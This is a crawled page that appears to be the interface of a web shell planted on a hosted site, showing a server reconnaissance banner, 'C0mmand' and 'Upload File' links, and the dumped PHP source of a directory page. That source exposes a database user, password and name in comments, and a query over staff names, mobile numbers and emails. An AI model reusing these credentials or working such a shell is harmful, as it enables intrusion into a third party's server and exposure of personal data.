|
Server IP : 2a02:4780:11:767:0:2c41:85d9:6 / Your IP : 216.73.217.38 Web Server : LiteSpeed System : Linux in-mum-web667.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64 User : u742491609 ( 742491609) PHP Version : 8.1.34 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u742491609/domains/apca.org.in/public_html/test/layout/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<html>
<head>
<title>Directory</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<link href="layout/styles/layout.css" rel="stylesheet" type="text/css" media="all">
<link href="css/style.css" rel="stylesheet"/>
<style type="text/css">
.table table{border:none; background-color: #F2F4F7;}
.table table,tr,td{text-decoration: none; background: #F2F4F7;border: none; font-size: 15px; }
.sidebar ul>li {
list-style: none;
padding-top: 8px !important;
color: #fff;
}
element.style {
height: 100%;
width: 100%;
}
</style>
</head>
<body id="top">
<div class="wrapper bgded">
<?php include("header.php"); ?>
<div class="wrapper row2">
<div id="" class="hoc clear">
<span style="font-size:15px;"><b>Directory</b></span>
</div>
<div id="breadcrumb" class="hoc clear">
<ul>
<li><a href="index.php">Home</a></li>
<li><a href="#">Directory</a></li>
</ul>
</div>
</div>
</div>
<div class="wrapper row3" >
<main class="hoc container clear" >
<!-- main body -->
<div style="margin-top:-35px;" >
<?php include("sidebar.php"); ?></div>
<div class="three_quarter" style="margin-top:-10px;" id="viewpdf">
<center><strong>DIRECTORY</strong>
<?php
// $host="localhost";
// $user="apca";
// $password="KbKh#,BF4fui";
// $database="apcaorg";
// $con = mysqli_connect($host,$user,$password,$database);
// if (!$con)
// {
// die('Could not connect: ' . mysql_error());
// }
// // mysqli_select_db($con,"Directory");
// $result = mysqli_query($con,"SELECT * FROM directory");
// echo "<table class='border'>
// <tr>
// <th>NAME</th>
// <th>DESIGNATION</th>
// <th>MOBILE</th>
// <th>MAILID</th>
// </tr>";
// while($row = mysqli_fetch_array($result))
// {
// echo "<tr>";
// //echo "<td>" . $row['Id'] . "</td>";
// echo "<td>" . $row['NAME'] . "</td>";
// echo "<td>" . $row['DESIGNATION'] . "</td>";
// echo "<td>" . $row['MOBILE_NUMBER'] . "</td>";
// echo "<td>" . $row['MAILID'] . "</td>";
// echo "</tr>";
// }
// echo "</table>";
// mysqli_close($con);
?>
</center>
</div>
<!-- <div id="Iframe-Cicis-Menu-To-Go" class="set-margin-cicis-menu-to-go set-padding-cicis-menu-to-go set-border-cicis-menu-to-go set-box-shadow-cicis-menu-to-go center-block-horiz" >-->
<!-- <div class="responsive-wrapper responsive-wrapper-padding-bottom-90pct" style="-webkit-overflow-scrolling: touch; overflow: auto; height: 600px;">-->
<!-- <iframe src="pdf/DIRECTORY.pdf" style="height: 100%; width: 100%">-->
<!-- <p style="font-size: 110%;"><em><strong>ERROR: </strong> -->
<!--An iframe should be displayed here but your browser version does not support iframes.</em> Please update your browser to its most recent version and try again, or access the file <a href="pdf/DIRECTORY.pdf">with this link.</a></p>-->
<!-- </iframe>-->
<!-- </div>-->
<!--</div>-->
</main>
</div>
<?php include("footer.php"); ?>
<!-- JAVASCRIPTS -->
<script src="layout/scripts/jquery.min.js"></script>
<script src="layout/scripts/jquery.backtotop.js"></script>
<script src="layout/scripts/jquery.mobilemenu.js"></script>
<!-- IE9 Placeholder Support -->
<script src="layout/scripts/jquery.placeholder.min.js"></script>
<!-- / IE9 Placeholder Support -->
</body>
</html>